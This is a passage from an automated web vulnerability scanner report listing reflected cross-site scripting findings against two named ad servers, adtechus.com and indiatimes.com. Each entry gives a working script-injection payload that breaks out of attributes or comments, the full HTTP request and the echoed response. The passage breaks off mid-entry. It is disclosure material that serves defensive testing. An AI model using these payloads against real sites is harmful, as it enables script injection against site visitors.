The value of the kvinvtype request parameter is copied into an HTML comment. The payload 5ae43--><script>alert(1)</script>02fed08acfd was submitted in the kvinvtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adrawdata/3.0/5108.1/1446938/0/0/ADTECH;kvinvtype=display;kvrid=1323243821bd3a2334d85d82f0661701;kvexpandable=1;kvdim=twig;kvbw=0;kvpid=1446938;kvgm=100;kva2534=100;kva2544=100;kva1834=100;kvagt18=100;kvagt25=100;kvagt35=1005ae43--><script>alert(1)</script>02fed08acfd HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19614

<!-- 00.00000 -->
<adFrames version="2.1" type="adFramesV2" ccid="1977158-1" rev="12033:12037MP" path="invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=1
...[SNIP]...
http://videoegg.adbureau.net/ccid=1977158-1invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=100;a2534=100;a2544=100;a1834=100;agt18=100;agt25=100;agt35=1005ae43--><script>alert(1)</script>02fed08acfd/adframes_Menu_GeneralClick=1/relocate=http://clk.atdmt.com/MRT/go/343014976/direct;at.PIX_Windows_WIN7_XP_AdFrDisplay_PCVid_1x1;ct.1/01/]]>
...[SNIP]...

6.14. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Issue detail

The value of the kvinvtype request parameter is copied into the HTML document as plain text between tags. The payload adce4<script>alert(1)</script>9fcdd70bbec was submitted in the kvinvtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adrawdata/3.0/5108.1/1446938/0/0/ADTECH;kvinvtype=display;kvrid=1323243821bd3a2334d85d82f0661701;kvexpandable=1;kvdim=twig;kvbw=0;kvpid=1446938;kvgm=100;kva2534=100;kva2544=100;kva1834=100;kvagt18=100;kvagt25=100;kvagt35=100adce4<script>alert(1)</script>9fcdd70bbec HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 8839

<!-- 00.00000 -->
<adFrames version="2.1" type="adFramesV2" ccid="1816855-1" rev="12033:12037MP" path="invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=1
...[SNIP]...
http://videoegg.adbureau.net/ccid=1816855-1invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=100;a2534=100;a2544=100;a1834=100;agt18=100;agt25=100;agt35=100adce4<script>alert(1)</script>9fcdd70bbec/adframes_1_generalclick=1/relocate=http://clk.atdmt.com/DEN/go/312213771/direct/01/</clickURL>
...[SNIP]...

6.15. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9ff65<script>alert(1)</script>954655b5f87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adrawdata/3.0/5108.1/1446938/0/0/ADTECH;kvinvtype=display;kvrid=1323243821bd3a2334d85d82f0661701;kvexpandable=1;kvdim=twig;kvbw=0;kvpid=1446938;kvgm=100;kva2534=100;kva2544=100;kva1834=100;kvagt18=100;kvagt25=100;kvagt35=100&9ff65<script>alert(1)</script>954655b5f87=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 15454

<!-- 00.00000 -->
<adFrames version="2.1" type="adFramesV2" ccid="1827986-1" rev="12033:12037MP" path="invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=1
...[SNIP]...
ttp://videoegg.adbureau.net/ccid=1827986-1invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=100;a2534=100;a2544=100;a1834=100;agt18=100;agt25=100;agt35=100&9ff65<script>alert(1)</script>954655b5f87=1/adframes_Summer_generalclick=1/relocate=https://www.facebook.com/ciroc?sk=app_123812771038369</clickURL>
...[SNIP]...

6.16. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c9a"><script>alert(1)</script>33c59ee1b19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adrawdata/3.0/5108.1/1446938/0/0/ADTECH;kvinvtype=display;kvrid=1323243821bd3a2334d85d82f0661701;kvexpandable=1;kvdim=twig;kvbw=0;kvpid=1446938;kvgm=100;kva2534=100;kva2544=100;kva1834=100;kvagt18=100;kvagt25=100;kvagt35=100&c7c9a"><script>alert(1)</script>33c59ee1b19=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19652

<!-- 00.00000 -->
<adFrames version="2.1" type="adFramesV2" ccid="1977158-1" rev="12033:12037MP" path="invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=100;a2534=100;a2544=100;a1834=100;agt18=100;agt25=100;agt35=100&c7c9a"><script>alert(1)</script>33c59ee1b19=1" invitationimp="http://adserver.adtechus.com/adcount/3.0/5108/1446938/0/16/AdId=1977158;BnId=1;ct=3890576291;st=1111;adcid=1;itime=105695154;reqtype=25;;kr9570=173114;kr9574=4924;kva2534=100;kr9575=
...[SNIP]...

6.17. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 877fc--><script>alert(1)</script>289571a82cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adrawdata/3.0/5108.1/1446938/0/0/ADTECH;kvinvtype=display;kvrid=1323243821bd3a2334d85d82f0661701;kvexpandable=1;kvdim=twig;kvbw=0;kvpid=1446938;kvgm=100;kva2534=100;kva2544=100;kva1834=100;kvagt18=100;kvagt25=100;kvagt35=100&877fc--><script>alert(1)</script>289571a82cb=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19670

<!-- 00.00000 -->
<adFrames version="2.1" type="adFramesV2" ccid="1977158-1" rev="12033:12037MP" path="invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=1
...[SNIP]...
ttp://videoegg.adbureau.net/ccid=1977158-1invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=100;a2534=100;a2544=100;a1834=100;agt18=100;agt25=100;agt35=100&877fc--><script>alert(1)</script>289571a82cb=1/adframes_Menu_GeneralClick=1/relocate=http://clk.atdmt.com/MRT/go/343014976/direct;at.PIX_Windows_WIN7_XP_AdFrDisplay_PCVid_1x1;ct.1/01/]]>
...[SNIP]...

6.18. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca81"><script>alert(1)</script>17af79f20bb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com5ca81"><script>alert(1)</script>17af79f20bb/TOI2009_City_Mumbai/index.html/1165705968@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:38:33 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 372
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com5ca81"><script>alert(1)</script>17af79f20bb/TOI2009_City_Mumbai/index.html/2057316228/Top/default/empty.gif/33323137376236613465363265346130" target="_top">
...[SNIP]...

6.19. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c486e"><script>alert(1)</script>3e9e9a70c2b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaic486e"><script>alert(1)</script>3e9e9a70c2b/index.html/1165705968@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:39:19 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 372
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaic486e"><script>alert(1)</script>3e9e9a70c2b/index.html/1398112108/Top/default/empty.gif/33323137376236613465363265346430" target="_top">
...[SNIP]...

6.20. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c516"><script>alert(1)</script>b832c1d5fa1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html3c516"><script>alert(1)</script>b832c1d5fa1/1165705968@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:39:59 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 371
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html3c516"><script>alert(1)</script>b832c1d5fa1/535116709/Top/default/empty.gif/33323137376236613465363265346430" target="_top">
...[SNIP]...

6.21. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd86"><script>alert(1)</script>1c0f4d00d00 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1fd86"><script>alert(1)</script>1c0f4d00d00? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:46 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 376
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1fd86"><script>alert(1)</script>1c0f4d00d00/706832738/UNKNOWN/default/empty.gif/33323137376236613465363265346430" target="_top">
...[SNIP]...

6.22. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 721b9"><script>alert(1)</script>36564f77927 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com721b9"><script>alert(1)</script>36564f77927/TOI2009_City_Mumbai/index.html/1324821476@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:05:48 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 372
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com721b9"><script>alert(1)</script>36564f77927/TOI2009_City_Mumbai/index.html/1835418878/Top/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.23. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4c34"><script>alert(1)</script>23ad4d945cd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaib4c34"><script>alert(1)</script>23ad4d945cd/index.html/1324821476@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:06:33 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 372
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaib4c34"><script>alert(1)</script>23ad4d945cd/index.html/1478899711/Top/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.24. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d80b9"><script>alert(1)</script>c4b625d9f56 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmld80b9"><script>alert(1)</script>c4b625d9f56/1324821476@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:12 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 372
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmld80b9"><script>alert(1)</script>c4b625d9f56/1331803423/Top/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.25. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fd3d"><script>alert(1)</script>86a946307aa was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/7fd3d"><script>alert(1)</script>86a946307aa? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:58 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 376
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/7fd3d"><script>alert(1)</script>86a946307aa/325059140/UNKNOWN/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.26. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a7a9"><script>alert(1)</script>49b58581aa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com8a7a9"><script>alert(1)</script>49b58581aa2/TOI2009_City_Mumbai/index.html/1352497994@Right3? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:06:00 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com8a7a9"><script>alert(1)</script>49b58581aa2/TOI2009_City_Mumbai/index.html/1569696419/Right3/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.27. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7a99"><script>alert(1)</script>0584b849768 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

